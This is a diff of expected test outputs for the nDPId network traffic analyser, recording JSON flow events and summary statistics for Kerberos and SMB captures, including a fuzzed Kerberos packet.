-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00707{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00706{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00710{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7580000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7580000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":477,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7580000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -189,7 +185,7 @@ 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-payload-len":24133,"total-not-detected-flows":2,"total-guessed-flows":23,"total-detected-flows":11,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":36,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":192,"global_ts_msec":1549337952283} +00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-payload-len":24133,"total-not-detected-flows":2,"total-guessed-flows":23,"total-detected-flows":11,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":36,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":188,"global_ts_msec":1549337952283} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 77/77 ~~ skipped flows.............: 0 @@ -198,9 +194,9 @@ ~~ total active/idle flows...: 36/36 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5959976 bytes -~~ total memory freed........: 5959976 bytes -~~ total allocations/frees...: 118356/118356 +~~ total memory allocated....: 6093610 bytes +~~ total memory freed........: 6093610 bytes +~~ total allocations/frees...: 121118/121118 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2423 chars diff --git a/test/results/kerberos_fuzz.pcapng.out b/test/results/kerberos_fuzz.pcapng.out index 75e1eb2cf..815c960b9 100644 --- a/test/results/kerberos_fuzz.pcapng.out +++ b/test/results/kerberos_fuzz.pcapng.out @@ -2,7 +2,7 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1633884084000} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} 00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633884084000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":288,"pkt_l4_len":268,"thread_ts_msec":1633884084000,"pkt":"RSYBIAFKAAAABn0BfgQBABMAAAAAWNGOAAAAAAAAAQAgAQAAAAAAAGZfRk9VTgAGA0QNChsbGxsbGxsbGxsbJwYGBgYGBgYGBhsbG10bGwYGBgYGBgYGBg0K\/\/\/\/\/05NRWGMG2VyMUnz8\/NDQQEAAAAAAABdKgC3MFD\/AAAAAABfAAAAAAAAAEVhjGlkO\/\/\/\/\/\/\/b2VyWQAAAAAAAABNRQAAAAAAAAAAAAAAAAAAAAAATUxAU0m3MFCjL1MuMlQg80NBTk1FYYxpZDsNCv\/\/\/\/9OTUVhjBtlcjFJ8\/P\/\/\/\/\/AAAAAAAAXSoAtzBQoy9TLkFOTUVhjGlkOw0K\/\/\/\/\/zsNCv\/\/\/\/8vUy4yVEFUIPNDQU5NRWGMaWQ7DQr\/\/\/\/\/"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1i???ca???????]*??0p??????_???????ea?id;?????o","username":"??????"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1i???ca???????]*??0p??????_???????ea?id;?????o","username":"??????"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} 